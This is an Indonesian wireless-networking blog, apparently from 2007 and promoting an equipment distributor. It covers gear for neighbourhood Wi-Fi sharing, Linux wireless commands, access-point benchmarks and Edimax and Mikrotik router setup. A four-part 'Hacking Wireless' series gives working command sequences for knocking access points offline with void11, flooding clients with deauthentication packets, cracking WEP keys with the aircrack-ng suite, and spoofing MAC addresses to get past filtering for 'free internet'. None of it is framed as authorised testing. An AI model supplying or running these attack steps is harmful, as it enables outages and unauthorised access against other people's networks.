Terima kasih telah berkunjung, Blog ini tercipta atas kerjasama kami dengan http://netkom-wifi.com
selaku distributor perangkat wireless terkemuka di tanah air.
Semoga dengan adanya tulisan-tulisan di blog ini bisa membantu anda dalam memahami dunia wireless.


Regards,


Cak Mad


NB :
Pingin sih buat Blog khusus tentang Korupsi, mengingat negara kita gak bisa Maju, faktor utamanya adalah Korupsi, karena Korupsi membuat hanya Pejabat saja yang Makmur, rakyat tetap terkubur, Korupsi membuat mental pelayanan publik menjadi memble, karena Birokrat kita hanya main gaple (sambil nunggu ceperan).












Saturday, September 29, 2007

Mengenal Perangkat Wireless RT-RW Net


Banyaknya pertanyaan yang diajukan ke penulis mengenai panduan peralatan yang dibutuhkan membuat RT RW Net, mendorong kami menuliskannya dalam blog ini,
pertama yang anda siapkan, adalah bahwa anda sudah memiliki koneksi internet Unlimited di tempat atau rumah yang akan dijadikan sebagai pemancar Wireless LAN(WLAN) anda.
Peralatan yang dibutuhkan antara lain :
1. Access Point








Fungsi Access Point ibaratnya sebagai Hub/Switch di jaringan lokal, yang bertindak untuk menghubungkan jaringan lokal dengan jaringan wireless/nirkabel para client/tetangga anda, di access point inilah koneksi internet dari tempat anda dipancarkan atau dikirim melalui gelombang radio, ukuran kekuatan sinyal juga mempengaruhi area coverage yang akan dijangkau, semakin tinggi kekuatan sinyal(ukurannya dalam satuan dBm atau mW) semakin luas jangkauannya. Ada beberapa akses poin yang cocok direkomendasikan untuk transmitter anda, misal Senao Engenius, Ubiquty Bullet, Edimax, dan Routerboard Mikrotik.

2. Antena Omni









Untuk memperluas coverage area hingga beberapa Kilometer, anda memerlukan antena omni eksternal, meski ketika anda membeli access point sudah dilengkapi antena omni, namun belumlah cukup karena hanya berkekuatan sekitar 3-5dB, untuk memperluas area jangkauannya, anda memerlukan antena Omni eksternal, yang rata-rata berkekuatan 15dB.
Antena Omni ini memiliki pancaran atau radiasi 360 derajat, jadi cocok bisa menjangkau client dari arah mana saja. Merk Antena Omni yang direkomendasikan, adalah Hyperlink, Finetic, tapi jika dana anda terbatas tak ada salahnya anda melirik antena omni buatan lokal.

3. Box Access Point







Untuk melindungi access point anda, maka diperlukan pelindung berbentuk kotak, bisa terbuat dari plastik atau plat besi, rata-rata kotak ini sudah dilengkapi dengan kunci pengaman, dan box ini memang harus diletakkan persis di bawah antena.

4. Kabel Pigtail/Kabel Jumper








Kabel Pigtail atau kabel jumperl diperlukan untuk menghubungkan antara antena omni dengan dengan access point, perhatikan panjang maksimal yang diperlukan hanya 1 meter, selebih dari itu anda akan mengalami degradasi sinyal(loss dB) Pada kedua ujung kabel terdapat konektor dimana type konektor disesuaikan dengan konektor yang melekat pada access point anda.

5. POE (Power Over E
thernet)







Agar kabel listrik tidak dinaikkan ke atas untuk "menghidupkan" access point maka anda memerlukan alat "POE" ini yang fungsinya mengalirkan listrik melalui kabel ethernet atau kabel UTP/STP, dengan alat ini maka anda tidak perlu repot-repot lagi mengulur kabel listrik ke atas tower, lebih praktis dan hemat.

6. Kab
el UTP/STP






Meski namanya perangkat wireless, namun peranan kabel juga diperlukan, kabel UTP/STP ini diperlukan untuk menghubungkan antara access point dengan jaringan kabel pada LAN lokal anda, jadi di bawah dia bisa ditancapkan ke komputer Gateway/Router atau ke Hub/Switch, pilihlah kabel UTP/STP yang berkualitas baik guna meningkatkan kualitas arus listrik yang dilewatkan melalui POE.

7. Penangkal Petir (Lightning Arrester)





Sebagai pengaman dari petir mak
a anda memerlukan alat ini yang berfungsi menyalurkan kelebihan beban listrik saat petir menyambar ke kabel pembumian(grounding), komponen ini atau yang biasa dikenal dengan Lightning Arrested Protector ini dipasang pada kabel jumper antara perangkat access point dengan antena eksternal. Grounding untuk penangkal petir umumnya ditanam dengan batang tembaga hingga kedalaman beberapa meter sampai mencapai sumber air. Ingat grounding yang kurang baik akan menyebabkan perangkat wireless tetap rentan terhadap serangan petir.

8. Tower









Guna mendapatkan jangkauan area coverage yang maksimal, anda perlu menaikkan antena omni eksternal ke tempat yang tinggi agar client WLAN anda bisa menangkap sinyal radio anda dengan baik.

## PERANGKAT CLIENT WLAN ##

Pada sisi client, untuk menangkap sinyal dari "antena omni" anda maka perangkat client sbb :
1. Untuk Client yang jaraknya dari tempat pemancar kurang dari 1 KM, lebih ekonomis jika menggunakan Wajan Bolic, dimana pada perangkat tersebut biasanya sudah dilengkapi dengan USB Wifi, yang disambungkan dengan kabel UTP plus kabel extended USB, jadi langsung anda bisa menancapkannya ke komputer.



2. Apabila jarak client lebih dari 1 KM, anda membutuhkan 2 perangkat, pertama, access point dan kedua antena eksternal pengarah atau type grid untuk menangkap sinyal dari pemancar anda. Berikut rekomendasinya :
- Jarak 0-1 KM, pakailah wajan bolic lebih ekonomis
- Jarak 1-2 KM, Akses poin merk Edimax/Bullet Ubiquity/Linksys, antenanya anda bisa
pakai Yagi atau Backfire
- Jarak 2-3 KM, Akses poin merk Edimax/Bullet2/Linksys, antena Grid 24db
- Jarak 3-10 KM. Akses poin merk Senao SL2611/Mikrotik, antena Grid 24db
- Jarak 10 KM lebih, Akses poin merk Senao ECCB3220/Mikrotik, antena Grid
24db.

*Daftar harga bisa dilihat di www.netkom-wifi.com

Saturday, September 22, 2007

Wireless Command Lines in Linux


Pada kesempatan kali ini kami membahas berbagai perintah setting wireless di Linux, namun tidak semua card atau PCMCIA support dengan perintah-perintah di bawah ini :
*Untuk menghubungkan ke wireless LAN yang Open atau Secured by WEP (DHCP)
#iwconfig [interface] mode managed key [WEP key]
->Gantilah kata "interface" dengan nama interface anda yang lagi aktif saat ini, misal ath0, wlan0 atau eth1.
->WEP key, masukkanlah kata kuci WEP, 10 carakter hexadecimal untuk 64 bit dan 26 carakter untuk 128 bit.

#iwconfig essid "[ESSID]" ->Spesifikasi SSID dari suatu WLAN
#
dhclient [interface] -> untuk mendapatkan IP address, netmask, DNS server and default gateway dari akses poin

*Untuk menghubungkan ke wireless LAN yang Open atau Secured by WEP (IP Manual/Statis)
#iwconfig [interface] mode managed key [WEP key]

#iwconfig essid "[ESSID]"
#route add default gw [IP of default gateway] ->Masukkan Ip Address gatewaynya
#
echo nameserver [IP address of DNS server] >> /etc/resolve.conf, konfigurasikan AP ->Konfigurasikan DNS server anda
#
ping www.detik.com ->ping ke internet untuk uji koneksi

* Kumpulan perintah iwconfig
iwconfig [interface] mode master ->Menjadikan kartu PCMCIA dalam mode akses poin
#
iwconfig [interface] mode managed -> Menjadikan kartu PCMCIA anda dalam mode client pada jaringan wifi infrastruktur
# iwconfig [interface] mode ad-hoc ->Mengeset kartu anda sebagai anggota di jaringan wifi ad hoc tanpa akses poin
#
iwconfig [interface] mode monitor ->Mengeset kartu anda dalam mode monitor
#
iwconfig [interface] essid “your ssid_here” ->konfigurasikan ssid jaringan anda.
#
iwconfig [interface] key 1111-1111-1111-1111 (mengeset kunci WEP 128bit)
# iwconfig [interface] key 11111111 (mengeset kunci WEP 65 bit)
# iwconfig [interface] key off (menonaktifkan kunci WEP)
#iwconfig [interface] key open (menset sebagai open mode,tidak diperlukan autentikasi)
# iwconfig [interface] channel [channel no.] (menset sebuah channel 1-14)
#iwconfig [interface] channel auto (memilih channel otomatis)
#iwconfig [interface] freq 2.422G (menset channel dalam Ghz)
#

#iwconfig [interface] ap 11:11:11:11:11:11 (memaksa kartu untuk mendaftar ke alamat AP)

# iwconfig [interface] rate 11M (kartu akan menggunakan kecepatan tertentu)

# iwconfig [interface] rate auto (memilih kecepatan otomatis)

# iwconfig [interface] rate auto 5.5M (kartu akan menggunakan kecepatan tertentu dan kecepatan di bawahnya jika memang diperlukan)


*Perintah ifconfig

#ifconfig [interface] up (mengaktifkan kartu jaringan)

#ifconfig [interface] down (menonaktifkan kartu jaringan)

#

ifconfig [interface] [IP address] netmask [subnet-mask] (menset IP address dan subnet mask scr manual)

#

ifconfig [interface] hw ether [MAC] (Merubah MAC address kartu PCMCIA dalam format 11:11:11:11:11:11)

Wednesday, September 12, 2007

Hacking Wireless IV: MELUMPUHKAN AKSES POIN(AP)



Yang dibutuhkan adalah software void11(download di http://www.wlsec.net/void11) dan Kismet( kalau mau lebih mudah pakai Distro Linux Auditor), lalu hardware yang dibutuhkan Laptop dengan PCMCIA Wifi chipset Prism,
Setelah perangkat yang dibutuhkan siap, jalankan Kismet terlebih dahulu untuk melakukan scanning jaringan wifi, setelah anda mendapat info MAC address dari AP target melalui Kismet, ketikkan pada console:

# switch-to-hostap
# iwpriv wlan0 hostapd 1 iwconfig wlan0 mode master
# void11_penetration wlan0 -D -t 1 -B 00:0E:2E:C2:2C:0E

keterangan : -D = debug
-t 1 = type serangan ke AP
-B = MAC Address AP target


-> Ingat pada waktu menjalankan instruksi serangan, Kismet masih aktif berjalan, jangan menutupnya, lalu tunggu beberapa saat, dan berikutnya.................. rontoklah AP target.

Saturday, September 8, 2007

Hacking Wireless III : Melumpuhkan Client yang terhubung pada suatu AP:


Melumpuhkan Client yang terhubung pada suatu AP:

  1. Jalankan Live CD LinuxBackTrack 2.


  1. Jalankan Kismet untuk mengetahui MAC-Address AP dan MAC-Address Client serta channel dari AP. Lalu catat semua infrmasi yang didapat.

  1. Tutup Kismet, lalu buka console, ketikkan:

#airmon-ng stop ath0 -> untuk mematikan driver ath0

#airmon-ng stop ath1 -> untuk mematikan driver ath1

#airmon-ng start wifi0 -> menghidupkan/mengaktifkan driver

  1. Jalankan scanning wireless menggunakan Airodump :

#airodump-ng ath0

  1. Berikutnya buka konsole satu lag(dgn Airodump masih aktif jalan) lakukan setting ath0 untuk melakukan serangan (De Authentication) pada komputer client (target). Ketikkan:

#ifconfig ath0 up -> untuk mengaktifkan ath0

#iwconfig ath0 mode monitor channel 11 -> menentukan agar ath0 dalam mode monitor, sedangkan angka 11 merupakan channel yang dipakai oleh AP (didapatkan dari hasil scanning Kismet).


  1. Langkah terakhir, kita lakukan serangan, ketikkan:

#aireplay-ng --deauth 20 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:

Aireplay-ng -> program yang digunakan untuk melakukan de authentication

--deauth -> option untuk serangan de authentication

20 -> jumlah sending packet

00:0E:2E:C1:1E:83 -> MAC-Address komputer target

-a -> option untuk Access Point

00:0E:2E:C2:2C:0E -> MAC-Address Access Point

ath0 -> interface yang digunakan untuk menyerang


By Destana & Wilis

Hacking Wireless II: Menembus Pertahanan WEP Keys


Menembus Pertahanan WEP Keys:

  1. Jalankan BackTrack.

  1. Reset driver wireless. Ketikkan:

#airmon-ng -> cek interface ath yang aktif

#airmon-ng stop ath0

#airmon-ng stop ath1 -> bila ath1 aktif

#airmon-ng start wifi0

  1. Buka 3 buah console.

  1. Console 1, ketikkan:

#airodump-ng ath0 -> scanning hotspot yang aktif.

#airodump-ng --channel 11 --bssid 00:0E:2E:C2:2C:0E -w target ath0

Keterangan:

Proses ini untuk mengcapture informasi dapat membantu dalam menembus WE

P Key.

--bssid -> MAC-Address dari AP yang akan di crack

-w target -> hasil capture ini akan disimpan di file yang namanya target

  1. Console 2, ketikkan:

Untuk membantu menciptakan pengumpulan paket data

#aireplay-ng --arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0

Keterangan:

-b -> MAC-Address dari AP.

-h -> MAC-Address dari client yang aktif terhubung ke AP.

  1. Console 3, ketikkan:

Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client.

#aireplay-ng --deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:

-c -> MAC-Address dari Client

-a -> MAC-Address dari AP

  1. Setelah terkumpul paket data yang cukup, dilakukan cracking:

#aircrack-ng target*.cap

Maka dapat kita lihat hasil WEP Key yang berhasil didapatkan.


By: Destana Dwi Maulidani & Wilis


Monday, September 3, 2007

Hacking Wireless I: Membobol MAC Address Filtering:


Membobol MAC Address Filtering:


  1. Jalankan Live CD Distro Linux BackTrack2, masukkan username “root”, lalu masukkan password “toor”.


  1. Setelah muncul prompt, ketikkan “startx”.


  1. Setelah muncul desktop environment KDE, klik tombol “K” (di pojok kiri bawah). Pilih BackTrack Radio Network Analysis -> 80211 Analyser Kismet.


  1. Lalu muncul window “Select Network Device”, pilih “wifi0”. Klik “OK”.


  1. Muncul tampilan Kismet, secara otomatis Kismet akan mencari wireless client yang sedang aktif. Bila ditemukan wireless client yang aktif tetapi tidak terhubung dengan jaringan, maka akan muncul pesan “ALERT: Suspicious client 00:02:6F:37:08:20 - probing networks but never participating.”


  1. Bila Kismet berhasil menemukan Access Point yang aktif, maka akan muncul pesan “Found IP 192.168.2.1 for slamet::00:0E:2E:C2:2C:0E via ARP”.

Keterangan:

slamet -> nama SSID

  1. Tutup Kismet, lalu buka console untuk menjalankan tools scanning yang lain, yakni airodump.

Keterangan:

Bila kita menggunakan program scanning yang lain, biasanya program pertama akan membuat driver wireless kita “rusak”. Untuk dapat digunakan pada program yang kedua, kita perlu memperbaiki driver tersebut (dimatikan lalu dihidupkan kembali).


  1. Cara memperbaiki driver, ketik:

#airmon-ng -> untuk mengecek interface yang tersedia.


Matikan driver “ath0” dan “ath1” dengan mengetik:

#airmon-ng stop ath0

#airmon-ng stop ath1 -> bila interface ath1 ada.


  1. Mengaktifkan driver yang baru, ketik:

#airmon-ng start wifi0


  1. Bila diketikkan perintah #iwconfig , maka muncul informasi “ath0” sudah aktif dengan Mode=Monitor.


  1. Berikutnya, ketik #airodump-ng ath0


  1. Dengan demikian maka kesimpulan bahwa dengan airodump mendapatkan hasil scanning MAC Address Client yang lebih cepat dibandingkan dengan menggunakan Kismet. Tetapi Client IP Address tidak bisa didapatkan, kecuali menggunakan Kismet.


  1. Kita juga dapat menggunakan program K-MAC(atau anda bisa merubah MAC Address melalui regedit) yang di-install pada windows untuk merubah MAC-Address Wireless kita menjadi MAC-Address salah satu client yang terdaftar pada MAC Address Filtering.


  1. Yang perlu dilakukan adalah mencari informasi MAC-Address client dengan mengunakan Kismet atau airodump, catat MAC-Address tersebut, lalu jalankan K-MAC di windows dan ubah MAC-Addressnya.

  2. Setelah restart komputer/laptop anda, dan mulai berinternet gratis deh........

By Destana Dwi Maulidani & Wilis



Konfigurasi Wireless Access Point Edimax 7206 Apg


Ikuti Langkah-Langkah berikut ini Untuk Menjadikan Edimax sebagai Hotspot dan Client :

  1. Pastikan Wireless AP Edimax anda sudah menyala dan kabel LANnya terhubung dengan komputer anda.


  1. Secara default IP Address dari Edimax adalah 192.168.2.1, jadi anda perlu menyeting IP Address komputer anda, misal 192.168.2.2.


  1. Buka browser favorit anda, lalu ketikkan pada address bar http://192.168.2.1


  1. Bila sudah muncul, maka tampilan awal adalah “Status and Information”, yang berisi informasi umum dari Wireless AP Edimax anda.


  1. Klik “Basic Setting” untuk menjadikan Wireless AP kita menjadi Access Point, berikut hal-hal yang perlu di setting:

Mode: AP

Band: 2.4 GHz (B+G)

ESSID: isi terserah anda

Channel Number: 11 (pemberian channel number akan dijelaskan pada point 6)

Lalu klik “Apply”, klik “Apply” lagi, tunggu Wireless AP anda akan melakukan restart. Bila sudah selesai, klik “OK”.


  1. Pemberian “Channel Number” sangatlah penting dan tidak boleh asal-asalan. Hal ini akan tampak bila di daerah jangkauan hotspot anda terdapat lebih dari 1 buah access point, maka akan terjadi interferensi.

Berikut caranya:

    1. pastikan bahwa channel yang anda gunakan tidak sama dengan AP yang berada disekitar anda. Gunakan NetStumbler untuk melihat channel dan AP yang telah ada.

    2. Untuk menghindari terjadinya interferensi, kita harus memberikan channel yang berbeda dari channel yang sudah ada. Contoh:

Channel yang sudah ada: 11

Channel yang kita berikan untuk AP kita: 8


Untuk Wireless AP Edimax sebagai Client:


  1. Klik Tab Basic Setting Pilih Mode “Station Infrastructure” Apply


  1. Masuk ke Basic Setting Site Survey Pilih AP yang akan dikoneksikan Lalu klik Connect.

  2. Lakukan test ping komputer lokal atau ping ke internet, semoga berhasil, God Bless You.


By Destana Dwi Maulidani & Wilis

TEST BERBAGAI AKSES POIN


Pada kesempatan kali ini kami menguraikan test/uji berbagai merk access point yang beredar di pasaran saat ini, sengaja dalam pengujian ini kami membiarkan setting akses poin dalam kondisi defaultnya, kalaupun ada itu hanya sekedar mengganti setiing ip address saja, demikian selamat menikmati
Pengujian menggunakan USB Wireless Edimax EW7318UG berchipsetkan Ralink yang diset sebagai Akses Poin(AP) dalam jaringan Ad Hoc, serta sebagai client penerima adalah PCMCIA WLAN AR5001X milik penulis yang berchipsetkan Atheros, dan alat test tool Netstumbler versi 0.4.0, kekuatan signal mencapai maksimum hingga 44 dan SNR 38 pada jarak 5 meter yang terhalang dinding tembok. Penulis juga melakukan ping dari komputer Windows XP ke USB Wifi Edimax dengan menggunakan perintah :
ping 192.168.1.50 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke USB Wifi Edimax selama 100 kali, hasilnya adalah paket yang terkirim sebanyak 97 dan 7 paket hilang (7%loss), waktu tempuh minimum 126ms, maksimum 306ms, rata-rata 173ms. Penulis juga melakukan transfer file video sebesar 547.906KB, hasilnya terkirim dengan mulus, tanpa terputus-putus, kesimpulanya adalah anda layak untuk membelinya, cocok banget buat berhotspot ria.


Test AP TP-LINK TP-link eXtended Range 54M Wireless Access Point

Pada kesempatan yng sama penulis melakukan test pada Akses Poin merk TP-Link TL-i, akses poin yang lagi naik daun ini berchipsetkan Atheros, sebagai client, tetap kami gunakan PCMCIA WLAN AR5001X , pada jarak 5 meter yang terhalang tembok tebal, kami berhasil melakukan transfer data berupa sebuah file sebesar 56,1MB tanpa terputus-putus, selama 2 menit 36,5 detik. Kemudian tetap pada jarak 5 meter yang terhalang tembok rapat, penulis melakukan test dengan Nestumbler, didapat kekuatan signal maksimal sebesar 37 dan SNR juga 32, lalu penulis juga melakukan ping dari notebook yang berbasiskan Windows XP ke AP TP-Link dengan menggunakan perintah
ping 192.168.1.1 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke AP TP-Link selama 100 kali, hasilnya adalah paket yang terkirim 0, tidak ada satupun yang berhasil terkirim, semuanya RTO (Request Time Out), begitu pula ketika diberi beban 1500 byte, hasilnya tetap RTO semua, baru ketika diberi beban 1470byte, 100% paket terkirim semua. Kesimpulannya meski mengusung chipset bagus, tapi kinerja TP-Link masih kurang memuaskan.



Tes AP Edimax 7206Apg

Kali ini penulis melkukan test pada Akses Poin merk Edimax 7206Apg, akses poin yang kawakan di kalangan praktisi wifi ini berchipsetkan Realtek, sebagai client, tetap kami gunakan PCMCIA WLAN AR5001X , pada jarak 5 meter yang terhalang tembok tebal, kami berhasil melakukan transfer data berupa sebuah file sebesar 56,1MB tanpa terputus-putus dalam waktu 41,9 detik. Kemudian tetap pada jarak 5 meter yang terhalang tembok rapat, penulis melakukan test dengan Nestumbler, didapat kekuatan signal maksimal sebesar 33 dan SNR sebesar 30, lalu penulis juga melakukan ping dari notebook yang berbasiskan Windows XP ke AP Edimax dengan menggunakan perintah
ping 192.168.2.1 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke AP TP-Link selama 100 kali, hasilnya adalah paket yang berhasil terkirim sebanyak 95 dan 5 paket hilang (5%loss), waktu tempuh minimum 125ms, maksimum 516ms, rata-rata 176ms.
Kesimpulannya nama tersohor Edimax, memang bukan bualan atau promosi belaka, meski tingkat signal di bawah AP TP-Link tapi performanya jauh diatas TP-Link.



Tes AP MINITAR Broadband Router

Kami juga melakukan test pada Akses Poin + Router merk Minitar, akses poin yang kawakan di kalangan praktisi wifi ini berchipsetkan Realtek, sebagai client, tetap kami gunakan PCMCIA WLAN AR5001X , pada jarak 5 meter yang terhalang tembok tebal, kami berhasil melakukan transfer data berupa sebuah file sebesar 56,1MB tanpa terputus-putus dalam waktu 51,3 detik. Kemudian tetap pada jarak 5 meter yang terhalang tembok rapat, penulis melakukan test dengan Nestumbler, didapat kekuatan signal maksimal sebesar 36 dan SNR sebesar 29, lalu penulis juga melakukan ping dari notebook yang berbasiskan Windows XP ke AP Edimax dengan menggunakan perintah
ping 192.168.1.254 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke AP Minitar selama 100 kali, hasilnya adalah paket yang berhasil terkirim sebanyak 98 dan 2 paket hilang (2%loss), waktu tempuh minimum 136ms, maksimum 259ms, rata-rata 165ms.
Kesimpulannya AP plus Router ini layak dijadikan sebagai gawang internet anda, kemampuan memorynya yang cukup besar yakni 256MB, mampu memberikan pelayanan yang cukup baik bagi para clientnya.



Tes AP Linksys WAP54G

Test juga dilakukan pada Akses Poin merk Linksys WAP 54G, akses poin yang kawakan di kalangan praktisi wifi ini berchipsetkan Realtek, sebagai client, tetap kami gunakan PCMCIA WLAN AR5001X , pada jarak 5 meter yang terhalang tembok tebal, kami berhasil melakukan transfer data berupa sebuah file sebesar 56,1MB tanpa terputus-putus dalam waktu 44,3 detik. Kemudian tetap pada jarak 5 meter yang terhalang tembok rapat, penulis melakukan test dengan Nestumbler, didapat kekuatan signal maksimal sebesar 25 dan SNR sebesar 31, lalu penulis juga melakukan ping dari notebook yang berbasiskan Windows XP ke AP Edimax dengan menggunakan perintah
ping 192.168.1.254 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke AP Minitar selama 100 kali, hasilnya adalah paket yang berhasil terkirim sebanyak 100 dan 0 paket hilang (0%loss), waktu tempuh minimum 126ms, maksimum 237ms, rata-rata 146ms.
Kesimpulannya AP besutan Cisco ini layak dijadikan sebagai andalan hotspot anda, kecepatan dan kestabilannya memang cukup mengagumkan, layak dengan design bodynya yang kokoh namun menawan.



Tes AP Edimax BR-6204Wg Wireless 802.11b/g Broadband Router with 4 Ports Switch

Test pada Akses Poin merk Edimax Router, akses poin yang kawakan di kalangan praktisi wifi ini berchipsetkan Realtek, sebagai client, tetap kami gunakan PCMCIA WLAN AR5001X , pada jarak 5 meter yang terhalang tembok tebal, kami berhasil melakukan transfer data berupa sebuah file sebesar 56,1MB tanpa terputus-putus dalam waktu 1 menit 5,7 detik. Kemudian tetap pada jarak 5 meter yang terhalang tembok rapat, penulis melakukan test dengan Nestumbler, didapat kekuatan signal maksimal sebesar 27 dan SNR sebesar 23, lalu penulis juga melakukan ping dari notebook yang berbasiskan Windows XP ke AP Edimax dengan menggunakan perintah
ping 192.168.2.1 -n 100 -l 65500
dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke AP TP-Link selama 100 kali, hasilnya adalah paket yang berhasil terkirim sebanyak 94 dan 6 paket hilang (6%loss), waktu tempuh minimum 144ms, maksimum 716ms, rata-rata 184ms.
Kesimpulannya meski tidak terlalu mengecewakan, namun hasil test kali ini lebih baik dari adiknya yakni Edimax 7206Apg.

Friday, August 17, 2007

Test USB Wireless Edimax EW7318UG




Kami melakukan pengujian menggunakan USB Wireless Edimax EW7318UG berchipsetkan Ralink yang diset sebagai Akses Poin(AP) dalam jaringan Ad Hoc, serta sebagai client penerima adalah PCMCIA WLAN AR5001X milik penulis yang berchipsetkan Atheros, dan alat test tool Netstumbler versi 0.4.0, kekuatan signal mencapai maksimum hingga 44 dan SNR 38 pada jarak 5 meter yang terhalang dinding tembok. Penulis juga melakukan ping dari komputer Windows XP ke USB Wifi Edimax dengan menggunakan perintah :

ping 192.168.1.50 -n 100 -l 65500

dimana perintah tersebut melakukan ping dengan kekuatan beban sebesar 65.500 bytes ke USB Wifi Edimax selama 100 kali, hasilnya adalah paket yang terkirim sebanyak 97 dan 7 paket hilang (7%loss), waktu tempuh minimum 126ms, maksimum 306ms, rata-rata 173ms. Penulis juga melakukan transfer file video sebesar 547.906KB, hasilnya terkirim dengan mulus, tanpa terputus-putus, kesimpulanya adalah anda layak untuk membelinya, cocok banget buat berhotspot ria.

Spesifiaksi Produk :

Standards IEEE 802.11b/g
USB Port USB 2.0 Type A
Frequency Band 2.4000~2.4835GHz
(Industrial Scientific Medical Band)

Modulation OFDM with BPSK, QPSK, 16QAM, 64QAM (11g)
BPSK, QPSK, CCK (11b)

Data Rate 54/48/36/24/18/12/11/9/6/5.5/2/1Mbps auto fallback
Security 64/128/256-bit WEP Data Encryption,
WPA/WPA2 (TKIP with IEEE 802.1x) and AES
Antenna Internal Antenna
Dimension 14(H) x 28.5(W) x 91(D) mm
Transmit Power 16 dBm (Typical)
Temperature 0~60oC
Humidity 10~85% (Non-Condensing)
Certification FCC, CE


Monday, August 13, 2007

Apakah Hotspot Wifi Gratis Bisa Ditembak dari Rumah kita?


Apakah Hotspot Gratis Bisa Ditembak dari Rumah kita?

Pertanyaan ini seringkali dilontarkan ke penulis, semenjak frekuensi 2.4Ghz dibebaskan penggunaannya oleh pemerintah, pertumbuhan jaringan wifi dan hotspot meningkat drastis, taman-taman hiburan, restoran, cafe, dan kantor tak luput memeriahkan suasana ber-hotspot ria. Kita bisa mengakses internet gratis dari tempat-tempat yang ada hotspotnya. Fenomena ini membuat ngiler sebagian masyarakat untuk mendapatkan kesempatan berinternet ria, bahkan merekapun ingin menikmati internet gratis dari rumah dengan dengan menembak sinyal wifi hotspot tersebut dari kediaman mereka, he he he bisa nggak ya............
Pada umumnya pembuatan hotspot cukup dengan menggunakan alat yang disebut akses poin, dimana pada akses poin tersebut sudah dilengkapi dengan antena internal yang berkekuatan sekitar 3-5db,(contoh akses poin ada pada gambar disamping) pemasangan akses poin dengan antena internal tersebut jangkauannya amat terbatas, sekitar puluhan atau bahkan ratusan meter persegi, diatas itu, sinyalnya sulit ditangkap, apalagi kalau diatas jarak 500 meter atau lebih dari tempat akses poin tersebut berada, konsepnya seperti kalau anda penggemar salah satu radio FM favorit anda di Surabaya, kemudian ketika anda bepergian ke Semarang, apakah anda bisa mendengar siaran radio kesayangan anda tersebut, meski dengan radio yang paling mahal di Semarang?? Konsep hotspot di tempat-tempat publik seperti itu memang didesain untuk kalangan pengguna lokal bukan untuk kalangan di luar tempat hotspot itu berada. Tapi kalau akses poin di tempat hotspot itu menggunakan antena luar/outdoor yang berkekuatan diatas 10 db atau lebih, maka ada kemungkinan dia bisa diakses dari jarak yang jauh, meski di luar tempat hotspot itu berada. Sebaiknya anda melakukan survey terlebih dahulu ke tempat hotspot itu untuk mengetahui type atau merk akses poin yang digunakan dan type antena yang menempel di akses poin tersebut, juga anda sebaiknya punya pengetahuan yang cukup tentang wifi beserta spesifikasi peralatan wifi, tanpa adanya pengetahuan itu sulit bagi anda untuk "menembaknya", meski memang sebagian hotspot sengaja dibuat untuk "terbuka", tidak ada pengamannya, jadi anda bisa untuk mengaksesnya, "JIKA" anda memang berada pada jangkauan sinyal wifi-nya

Membuat Router Murah dan Mudah dengan Mikrotik

Dalam dunia wifi nama Mikrotik sangat tersohor baik sebagai Operating System (OS) router maupun penyedia peralatan wifi, meski untuk OS komplit yang mencakup Proxy, bandwidth management, firewall, hotspot, VPN dll kita harus mengeluarkan biaya untuk lisensinya, namun kalau kita gunakan hanya sebagai router saja, Sistem operasi dari Latvia ini bisa digunakan tanpa adanya batasan waktu, kita bisa mendownloadnya secara cuma-cuma di www.mikrotik.co.id, namun kalau semua fungsi diatas selain router kita hanya di diberi batasan satu hari saja untuk penggunaannya. Jadi dengan komputer yang cukup minim speknya misal Pentium I , hard disk 1-2 GB, memory 64 MB, tanpa mouse, keyboard ataupun monitor, kalau Mikrotik sudah jalan, kita hanya butuh mose, keyboard dan monitor sewaktu instalasi saja. jadi kita sudah bisa membuat router dengan dana minim, daripada kita membeli peralatan router yang bisa jutaan rupiah mahalnya. Mari kita mulai melakukan instalasi, sebelumnya kita sudah memiliki file imagenya Mikrotik yang didownload dari situsnya www.mikrotik.co.id, lalu kita burn ke cd blank.

INSTALASI

Sebelumnya pastikan komputer yang akan diinstall Mikrotik OS sudah ada 2 Lan Card, untuk spek hardware yang akan digunakan, anda bisa melihat rujukannya di http://mikrotik.com

* booting dari CD ROM

Pilih paket-paket yang akan dipilih, untuk kebutuhan Router+Proxy+Bandwidth Management, sebaiknya anda pilih :

System

DHCP

Advanced Tols

Routing

Routing Test

Security

Synchronous

Web Proxy

Web Proxy Test

Setelah memilih paket2 yang dibutuhkan tekan tombol “ i “ untuk mulai instalasi

Muncul tulisan “Do you want to keep...............” pilih n (no)

“Continue.....” , pilih y (yes)

Mulailah membuat partisi dan memformat hard disk, setelah instalasi paket2 yang tadi dipilih.

Setelah selesai, Mikrotik minta di reboot dengan menekan enter.

Setelah booting, muncul perintah untuk melakukan pengecekan hard disk, anda bisa pilih yes atau no, pilih no juga tidak mengapa jika anda yakin hard disk bebas dari bad sector.

Anda diminta untuk login, ketikkan admin pada : Mikrotik Login: admin

untuk mengisikan password tekan enter saja, karena password masih kosong pada instalasi baru,

Dou you want to see...................., pilih no, untuk mempercepat proses

Muncul konsole Mikrotik, yaitu :

[admin@Mikrotik] >

Untuk merubah nama mesin Mikrotik ini, ketik :

[admin@Mikrotik] > system identity set name=mywifi

Lalu konsole berubah menjadi

[admin@mywifi] >

Merubah password mesin Mikrotik, ketikkan password =

[admin@mywifi] > password

old password (ketikkan kosong, jika sebelumnya anda belum mengeset password

new password : .........(ketikkan password yg baru?

retype new password :................ (masukkan sekali lagi passwordnya)

Untuk mematikan mematikan Mikrotik cukup kita ketikkan sbb

[admin@mywifi] > system shutdown

[admin@mywifi] > system reboot (untuk merestart nya)

[admin@mywifi] > system reset (untuk mereset konfigurasi yang sudah kita buat sebelumnya)

Perintah-perintah diatas harus dilakukan pada direktori admin.

Setelah itu anda perlu mengaktifkan kedua LAN Card yang terpasang, dengan contoh perintah di bawah ini :

[admin@mywifi] > interface ethernet enable ether1

[admin@mywifi] > interface ethernet enable ether2

